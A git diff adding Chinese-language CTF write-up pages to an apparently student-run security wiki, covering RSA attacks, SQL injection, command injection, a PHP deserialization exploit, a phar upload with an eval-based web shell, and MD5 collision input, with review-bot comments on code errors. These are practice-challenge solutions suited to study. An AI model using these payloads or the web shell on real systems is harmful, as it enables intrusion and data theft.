diff --git a/404.html b/404.html
index 82c07de..cdebf0a 100755
--- a/404.html
+++ b/404.html
@@ -216,6 +216,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -623,6 +639,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/award/index.html b/award/index.html
index 35babb3..abcd08c 100755
--- a/award/index.html
+++ b/award/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -742,6 +758,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/ctfnotes/CTF-CPYPTO-2/index.html b/ctfnotes/CTF-CPYPTO-2/index.html
new file mode 100755
index 0000000..3bbeee5
--- /dev/null
+++ b/ctfnotes/CTF-CPYPTO-2/index.html
@@ -0,0 +1,1297 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF CPYPTO wp-2 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+CTF CPYPTO happy
+下载下来附件
+('c=', '0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9eL')
+('e=', '0x872a335')
+q + q*p^3 =1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586
+qp + q *p^2 = 1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594
+由于0x开头没有L,先把L去掉
+使用gmpy2 编写python脚本
+import gmpy2
+import sympy
+from Crypto.Util.number import *
+c = 0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9e
+
+e = 0x872a335
+
+k1=1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586
+k2 =gmpy2.mpz(k1)
+k2=1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594
+
+p=sympy.Symbol('p')
+q=sympy.Symbol('q')
+solved_value=sympy.solve([q + q*p**3 - k1,q*p + q*p**2 -k2], [p,q])
+print(solved_value)
+p=1158310153629932205401500375817
+q=827089796345539312201480770649
+
+d = gmpy2.invert(e,(p-1)*(q-1))
+m = gmpy2.powmod(c,d,p*q)
+print(long_to_bytes(m))
+
+得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
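Review bot: In the solve script, `k2 =gmpy2.mpz(k1)` is dead code because `k2` is reassigned on the very next line, and the `p`/`q` used for decryption are pasted in by hand after `print(solved_value)` rather than read from the solver result. Dropping the first `k2` line and adding `assert q + q*p**3 == k1 and q*p + q*p**2 == k2` before the `gmpy2.invert` call would let a reader confirm that the pasted factors satisfy the two leaked relations. The heading and the directory name also spell the category `CPYPTO`, while the sibling pages in this commit use `CRYPTO`.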
diff --git a/ctfnotes/CTF-CRYPTO-1/index.html b/ctfnotes/CTF-CRYPTO-1/index.html
new file mode 100755
index 0000000..4797177
--- /dev/null
+++ b/ctfnotes/CTF-CRYPTO-1/index.html
@@ -0,0 +1,1286 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF CRYPTO wp-1 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ez_rsa:
+下载附件:
+
+用编写python代码,因为RSA可逆 :
+p = 1325465431
+
+q = 152317153
+
+e = 65537
+
+n = p*q
+
+L = (p-1)*(q-1)
+
+d = pow(e,-1,L)
+
+print(d)
+
+解出D=43476042047970113
+再经过md5加密得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
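Review bot: `d = pow(e,-1,L)` only works on Python 3.8 or later, where three-argument `pow` accepts a negative exponent; older interpreters raise an error, so a comment such as `# modular inverse of e mod L, needs Python >= 3.8` would help. The last step (`再经过md5加密得到flag`) is described but not shown, and it does not say which representation of `d` is hashed, so the result cannot be reproduced from the page alone. `n = p*q` is computed but never used in the snippet.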
diff --git a/ctfnotes/CTF-CRYPTO-3/index.html b/ctfnotes/CTF-CRYPTO-3/index.html
new file mode 100755
index 0000000..6fb15fc
--- /dev/null
+++ b/ctfnotes/CTF-CRYPTO-3/index.html
@@ -0,0 +1,1341 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF CRYPTO wp-3 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+RSA共模:
+附件.py:
+from gmpy2 import *
+
+from Crypto.Util.number import *
+
+
+flag = '***************'
+
+p = getPrime(512)
+
+q = getPrime(512)
+
+m1 = bytes_to_long(bytes(flag.encode()))
+
+
+n = p*q
+
+e1 = getPrime(32)
+
+e2 = getPrime(32)
+
+print()
+
+flag1 = pow(m1,e1,n)
+
+flag2 = pow(m1,e2,n)
+
+print('flag1= '+str(flag1))
+
+print('flag2= '+str(flag2))
+
+print('e1= ' +str(e1))
+
+print('e2= '+str(e2))
+
+print('n= '+str(n))
+
+
+
+flag1= 100156221476910922393504870369139942732039899485715044553913743347065883159136513788649486841774544271396690778274591792200052614669235485675534653358596366535073802301361391007325520975043321423979924560272762579823233787671688669418622502663507796640233829689484044539829008058686075845762979657345727814280
+
+flag2= 86203582128388484129915298832227259690596162850520078142152482846864345432564143608324463705492416009896246993950991615005717737886323630334871790740288140033046061512799892371429864110237909925611745163785768204802056985016447086450491884472899152778839120484475953828199840871689380584162839244393022471075
+
+e1= 3247473589
+
+e2= 3698409173
+
+n= 103606706829811720151309965777670519601112877713318435398103278099344725459597221064867089950867125892545997503531556048610968847926307322033117328614701432100084574953706259773711412853364463950703468142791390129671097834871371125741564434710151190962389213898270025272913761067078391308880995594218009110313
+
+python脚本
+from gmpy2 import *
+from Crypto.Util.number import *
+
+flag1= 100156221476910922393504870369139942732039899485715044553913743347065883159136513788649486841774544271396690778274591792200052614669235485675534653358596366535073802301361391007325520975043321423979924560272762579823233787671688669418622502663507796640233829689484044539829008058686075845762979657345727814280
+flag2= 86203582128388484129915298832227259690596162850520078142152482846864345432564143608324463705492416009896246993950991615005717737886323630334871790740288140033046061512799892371429864110237909925611745163785768204802056985016447086450491884472899152778839120484475953828199840871689380584162839244393022471075
+e1= 3247473589
+e2= 3698409173
+n= 103606706829811720151309965777670519601112877713318435398103278099344725459597221064867089950867125892545997503531556048610968847926307322033117328614701432100084574953706259773711412853364463950703468142791390129671097834871371125741564434710151190962389213898270025272913761067078391308880995594218009110313
+
+def egcd(a, b):
+ if a == 0:
+ return (b, 0, 1)
+ else:
+ g, y, x = egcd(b % a, a)
+ return (g, x - (b // a) * y, y)
+s = egcd(e1,e2)
+s1 = s[1]
+s2 = s[2]
+m = pow(flag1,s1,n)*pow(flag2,s2,n) % n
+# print(m)
+flag = long_to_bytes(m)
+print(flag)
+
+求得NSSCTF{xxxxx* *xxxxx}
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
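Review bot: The solve script never checks that `egcd(e1,e2)` returned a gcd of 1, which is the precondition for the step that follows; adding `assert s[0] == 1` after the call would document it. One of `s1`/`s2` is necessarily negative, so `pow(flag1,s1,n)*pow(flag2,s2,n) % n` depends on the built-in `pow` accepting a negative exponent (Python 3.8+, assuming the wildcard imports do not shadow it), and a comment saying so would explain why no explicit inversion appears. The page would also benefit from one sentence on the flaw visible in 附件.py: the same unpadded message is encrypted under a single `n` with two different exponents, which randomized padding such as OAEP and one key pair per modulus both prevent.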
diff --git a/ctfnotes/CTF-CRYPTO-4/index.html b/ctfnotes/CTF-CRYPTO-4/index.html
new file mode 100755
index 0000000..81e654e
--- /dev/null
+++ b/ctfnotes/CTF-CRYPTO-4/index.html
@@ -0,0 +1,1323 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF CRYPTO wp-4 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[羊城杯 2021]Bigrsa
+附件提示:共享素数
+from Crypto.Util.number import *
+from gmpy2 import *
+from flag import *
+from Crypto.Util.number import *
+from flag import *
+
+n1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061
+n2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073
+e = 65537
+
+# m = bytes_to_long(flag)
+
+# c = pow(m, e, n1)
+
+# c = pow(c, e, n2)
+
+# print("c = %d" % c)
+
+# output
+
+c = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264
+
+编写脚本
+from Crypto.Util.number import *
+from gmpy2 import *
+# from flag import *
+
+n1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061
+n2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073
+e = 65537
+# m = bytes_to_long(flag)
+# c = pow(m, e, n1)
+# c = pow(c, e, n2)
+
+# print("c = %d" % c)
+
+# output
+c = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264
+
+p=GCD(n1,n2)
+q1=n1//p
+q2=n2//p
+
+phi1=(p-1)*(q1-1)
+phi2=(p-1)*(q2-1)
+
+d1=gmpy2.invert(e,phi1)
+d2=gmpy2.invert(e,phi2)
+c1=pow(c,d2,n2)
+m=pow(c1,d1,n1)
+flag = long_to_bytes(m)
+print(flag)
+
+得flag:
+SangFor{qSccmm1WrgvIg2Uq_cZhmqNfEGTz2GV8}
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
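Review bot: The solve script calls `gmpy2.invert(e,phi1)` and `gmpy2.invert(e,phi2)`, but the only gmpy2 import shown is `from gmpy2 import *`, which binds the module's functions and not the name `gmpy2`, so as written these lines raise `NameError`. Either add `import gmpy2` or call `invert(e, phi1)` directly. The same problem appears in ctfnotes/problem-227-wp/index.html at `p = gmpy2.gcd(n1, n2)`, and that page is a second write-up of the same challenge. An `assert p > 1` after `p=GCD(n1,n2)` would make the shared-prime assumption explicit before the two private exponents are derived.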
diff --git a/ctfnotes/CTF-CRYPTO-5/index.html b/ctfnotes/CTF-CRYPTO-5/index.html
new file mode 100755
index 0000000..5c75e9d
--- /dev/null
+++ b/ctfnotes/CTF-CRYPTO-5/index.html
@@ -0,0 +1,1279 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF CRYPTO wp-5 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[鹤城杯 2021]A_CRYPTO
+4O595954494Q32515046324757595N534R52415653334357474R4N575955544R4O5N4Q46434S4O59474253464Q5N444R4Q51334557524O5N4S424944473542554O595N44534O324R49565746515532464O49345649564O464R4R494543504N35
+先rot 13
+得4B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35
+再base16
+KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5
+再base32
+V143Pytkc2lAYlV3SlRmVXQ9X0dVdmd6KEYpP3t4V29+MElXSER9TUEkPA==
+再base64
+得W^7?+dsi@bUwJTfUt=_GUvgz(F)?{xWo~0IWHD}MA$<
+最后在https://gchq.github.io/CyberChef/上转base85
+得
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/CTF-WEB-2/index.html b/ctfnotes/CTF-WEB-2/index.html
new file mode 100755
index 0000000..bc162f0
--- /dev/null
+++ b/ctfnotes/CTF-WEB-2/index.html
@@ -0,0 +1,1283 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF WEB wp-2 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+easy_sql
+title提示参数是wllm
+
+order by查看有几列
+
+得到3列
+改wllm=-1
+?wllm=-1’ union select 1,2,3 --+
+得到2,3
+?wllm=-1' union select 1,2,database()--+
+
+?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
+
+?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test_tb'--+
+
+/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+
+得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
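Review bot: The column-listing step filters on `table_schema='test_tb'`, while the step before it uses `test_db` as the schema and the step after it reads `test_tb` as a table, so one of these names looks mistyped; the first `union select` line also uses a typographic `’` where every other line uses `'`. The write-up ends at `得到flag` without naming the flaw or its fix. Presumably the `wllm` value is concatenated into the SQL text (the challenge source is not shown), in which case a closing line along the lines of `Fix: bind wllm as a query parameter (prepared statement) instead of concatenating it into the SQL string` would give readers the defensive takeaway.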
diff --git a/ctfnotes/CTF-Web-1/index.html b/ctfnotes/CTF-Web-1/index.html
new file mode 100755
index 0000000..e7df651
--- /dev/null
+++ b/ctfnotes/CTF-Web-1/index.html
@@ -0,0 +1,1323 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF WEB wp-1 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF WEB wp-1
+
+Do_you_konw_http
+
+提示修改user agent 为WLLM
+使用burp抓包 然后send 到 repeater中 在repeater中修改为WLLM
+得到
+
+提示有个a.php
+解除拦截后进入到a.php
+
+要将地址改为本地的回环地址,也就是127.0.0.1
+使用fakeip插件进行修改ip
+
+显示success,并发现secretttt.php
+
+进入到secretttt.php 得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git "a/ctfnotes/RSA\347\256\227\346\263\225\345\216\237\347\220\206/index.html" "b/ctfnotes/RSA\347\256\227\346\263\225\345\216\237\347\220\206/index.html"
new file mode 100755
index 0000000..746ebe6
--- /dev/null
+++ "b/ctfnotes/RSA\347\256\227\346\263\225\345\216\237\347\220\206/index.html"
@@ -0,0 +1,1490 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ RSA算法原理 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+RSA算法原理
+本文借鉴了https://en.wikipedia.org/wiki/RSA_(cryptosystem) 中的资料和些图片
+一、RSA加密过程:
+(1)RSA基本原则:
+ RSA 背后的一个基本原则是观察到找到三个非常大的正整数 e、d 和 n 是可行的,使得对所有整数 m(0 ≤ m < n)进行模幂运算:
+
+ 三杠表示模同余,也就是当调换e和d的位置,会有相同的余数
+
+RSA 涉及公钥 和私钥 。公钥是众所周知的,用于加密消息。目的是使用公钥加密的消息只能在合理的时间内使用私钥解密。公钥由整数n 和e 表示,私钥由整数d 表示(尽管在解密过程中也会使用n ,因此它也可能被认为是私钥的一部分)。m 代表消息。
+(2)密钥生成:
+RSA算法的密钥以下方式生成:
+1.选择两个相差大的大质数 p 和 q
+ 为了使得因式分解更难,p和q要随机选择:为了选择它们,标准方法是选择随机整数并使用素数测试 ,直到找到两个素数。p和q应保密
+2.计算n
+ n = p*q
+ n作为公钥和私钥的模数。它的长度,通常用比特来表示,就是密钥长度
+3.计算λ ( n )
+在数论这一 数学 分支中,正整数 n 的Carmichael 函数 λ ( n )是满足以下条件的 最小正整数m
+
+ 在代数术语中,λ ( n )是整数乘法群对n取模的指数。
+由于n = pq , λ ( n ) = lcm ( λ ( p ), λ ( q )),并且由于p 和q 是素数,因此λ ( p ) = φ ( p ) = p − 1,同样地λ ( q ) = q − 1。因此λ ( n ) = lcm( p − 1, q − 1)。
+4.选择一个整数e 使得2 < e < λ ( n )和gcd ( e , λ ( n )) = 1;也就是说,e 和λ ( n )互质 。
+ 最常选择的e值是2^16 + 1 =65537
+ e作为公钥的一部分发布
+5.确定d
+ d ≡ e −1 (mod λ ( n ));也就是说,d 是e 模λ ( n )的模乘逆
+
+二、RAS解密过程:
+ 通过计算使得私钥指数从d到c恢复m
+
+示例:
+
+ 但实际使用中国余数定理来加速因子模数的计算(mod pq 使用 mod p 和 mod q)
+中国余数算法:
+
+
+
+
+签名消息
+假设 Alice 希望向 Bob 发送一条签名消息。她可以使用自己的私钥来这样做。她生成消息的散列值 ,将其计算为d 的幂(模n )(就像她在解密消息时所做的那样),并将其作为“签名”附加到消息中。当 Bob 收到签名消息时,他使用相同的哈希算法结合 Alice 的公钥。他对签名求e 次方(模n )(就像他在加密消息时所做的那样),并将生成的散列值与消息的散列值进行比较。如果两者一致,他就知道消息的作者拥有爱丽丝的私钥,并且消息自发送以来没有被篡改过。
+这是运用了求幂规则:
+
+费马小定理
+ 如果p是素数,则对于任意的a,数a^p-a是p的整数倍。
+
+例如 a =2, p =7 则 2^7 = 128,128-2=126=7*18 为7的整数倍
+如果a 不能被p整除,即如果a与p互质,费马小定理等价于(p^-1)-1是p的整数倍
+
+总结:
+在RSA密码应用中,公钥是被公开的,即e和n的数值是可以被得到的。破解RSA密码就是从已知的额和n求得d。这样就可以使用私钥来破解密文了。
+但当p和q是一个很大的素数时,从n去分解因子p和q,是数学界公认的难题。
+因此,在进行RSA加密的时候,应尽量的使用足够大的p和q,来保证d不会被算出
+但是,RSA的缺点也很明显:
+ RSA的安全性完全来自于因子分解,破译RSA的难度等价于分解因子的难度
+ 密钥的产生十分麻烦,受到p和q的影响,很难做到一次一个密钥
+ RSA需要更长的密钥,这就使得运算速度较慢。
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
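Review bot: The Fermat's-little-theorem paragraph states the coprime case as `(p^-1)-1是p的整数倍`, which drops the base; it should read `a^(p-1) - 1 是 p 的整数倍`. In the summary, `破译RSA的难度等价于分解因子的难度` overstates what is known: factoring `n` is sufficient to break RSA, but the converse has not been proven, so "no harder than factoring" would be accurate. The page describes textbook RSA only, and a sentence noting that real deployments add randomized padding (OAEP for encryption, PSS for signatures) would keep readers from treating bare `m^e mod n` as safe. Smaller slips are the section title `RAS解密过程`, `已知的额和n` (for `e和n`), and the decryption sentence, which should say that `m` is recovered from `c` using `d`.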
diff --git a/ctfnotes/problem-1096-wp/index.html b/ctfnotes/problem-1096-wp/index.html
new file mode 100755
index 0000000..c363d53
--- /dev/null
+++ b/ctfnotes/problem-1096-wp/index.html
@@ -0,0 +1,1272 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [GXYCTF 2019]Ping Ping Ping - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[GXYCTF 2019]Ping Ping Ping
+沙箱
+$ISF9绕过空格
+exp
+?ip=localhost;a=ag;b=fl;cat$IFS$9$b$a.php
+然后F12看就能看到了~~才不会说因为这个卡了多久~~
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
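Review bot: The prose line `$ISF9绕过空格` misspells the shell variable; the request shown two lines below uses `$IFS$9`, so the text should match it. The page also never says what makes the request work: presumably the `ip` parameter is interpolated into a shell command (the challenge source is not shown), and a closing sentence naming that, together with the fix of validating `ip` as an address and running ping without a shell, would round the note out.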
diff --git a/ctfnotes/problem-1852-wp/index.html b/ctfnotes/problem-1852-wp/index.html
new file mode 100755
index 0000000..96b64f5
--- /dev/null
+++ b/ctfnotes/problem-1852-wp/index.html
@@ -0,0 +1,1367 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [NISACTF 2022]babyserialize - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[NISACTF 2022]babyserialize
+
+审计源码
+构建pop链
+
+NISA.__invoke()
+=>Ilovetxw.__toString()
+ =>four.__set(fun,"sixsixsix")
+ =>Ilovetxw.__call(nisa,"sixsixsix")
+ =>TianXiWei.__wakeup()
+
+
+写exp
+
+<?php
+
+class NISA
+{
+ public $fun = "show_me_fla";
+ public $txw4ever;
+ public function __wakeup()
+ {
+ if ($this->fun == "show_me_flag") {
+ hint();
+ }
+ }
+ function __call($from, $val)
+ {
+ $this->fun = $val[0];
+ }
+
+ public function __toString()
+ {
+ echo $this->fun;
+ return " ";
+ }
+ public function __invoke()
+ {
+ checkcheck($this->txw4ever);
+ @eval($this->txw4ever);
+ }
+}
+
+class TianXiWei
+{
+ public $ext;
+ public $x;
+ public function __wakeup()
+ {
+ $this->ext->nisa($this->x);
+ }
+}
+
+class Ilovetxw
+{
+ public $huang;
+ public $su;
+ public function __call($fun1, $arg)
+ {
+ $this->huang->fun = $arg[0];
+ }
+
+ public function __toString()
+ {
+ $bb = $this->su;
+ return $bb();
+ }
+}
+
+class four
+{
+ public $a = "TXW4EVER";
+ private $fun = 'abc';
+ public function __set($name, $value)
+ {
+ $this->$name = $value;
+ if ($this->fun = "sixsixsix") {
+ strtolower($this->a);
+ }
+ }
+}
+
+$a = new NISA;
+$b = new Ilovetxw;
+$c = new four;
+$d = new Ilovetxw;
+$f = new TianXiWei;
+//
+//$a->txw4ever = 'SYSTEM("ls /");';
+$a->txw4ever = 'SYSTEM("cat /fllllllaaag");';
+$b->su = $a;
+$c->a = $b;
+$d->huang = $c;
+$f->x = "sixsixsix";
+$f->ext = $d;
+
+echo urlencode(serialize($f));
+//
+
+
+得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
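Review bot: The chain under `构建pop链` is listed sink-first (`NISA.__invoke()` at the top, `TianXiWei.__wakeup()` at the bottom) while the `=>` arrows read as call order, so a reader following the arrows gets the flow backwards; reverse the list or label the direction. The listing also mixes the challenge's classes with the author's own lines, and a comment such as `// payload construction starts here` above `$a = new NISA;` would separate the two. Like problem-2099-wp and problem-2602-wp in this commit, the page stops without a defensive takeaway: the classes shown reach `eval` from magic methods, so request data should not be handed to `unserialize()` at all, or only with `['allowed_classes' => false]`.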
diff --git a/ctfnotes/problem-2026-wp/index.html b/ctfnotes/problem-2026-wp/index.html
new file mode 100755
index 0000000..5c603fd
--- /dev/null
+++ b/ctfnotes/problem-2026-wp/index.html
@@ -0,0 +1,1285 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [NISACTF 2022]bingdundun~ - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[NISACTF 2022]bingdundun~
+phar 上传然后phar伪协议访问
+
+//pchar.php
+<?php
+$phar = new Phar('exp.phar'); //
+$phar->buildFromDirectory('./exp');//buildFromDirectory指定压缩的目录
+$phar->compressFiles(Phar::GZ); //Phar::GZ表示使用gzip来压缩此文件
+$phar->stopBuffering();
+$phar->setStub($phar->createDefaultStub('exp.php'));//setSub用来设置启动加载的文件
+?>
+//exp/exp.php
+<?php
+@eval($_POST['shell']);
+?>
+
+最后蚁剑访问 密码shell
+?bingdundun=phar://./upload_name/exp
+flag就在/flag里
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
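Review bot: The page lists the steps but never states the weakness they rely on. From the request shown (`?bingdundun=phar://./upload_name/exp`) the application appears to pass the `bingdundun` parameter to an include-style call and to keep uploads where that call can reach them; a closing paragraph saying so, with the fixes (map the parameter to a fixed allow-list of page names, store uploads outside the include path), would make this useful to readers who maintain such code. The same gap applies to problem-2422-wp. In the listing, the comment `setSub用来设置启动加载的文件` should read `setStub`.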
diff --git a/ctfnotes/problem-2036-wp/index.html b/ctfnotes/problem-2036-wp/index.html
new file mode 100755
index 0000000..ec24d13
--- /dev/null
+++ b/ctfnotes/problem-2036-wp/index.html
@@ -0,0 +1,1295 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [NISACTF 2022]level-up - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[NISACTF 2022]level-up
+
+level-1
+进入写着nothing here
+F12发现写着disallow
+推测robots.txt
+访问即获得level 2地址
+level-2
+php md5 强碰撞
+post array1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
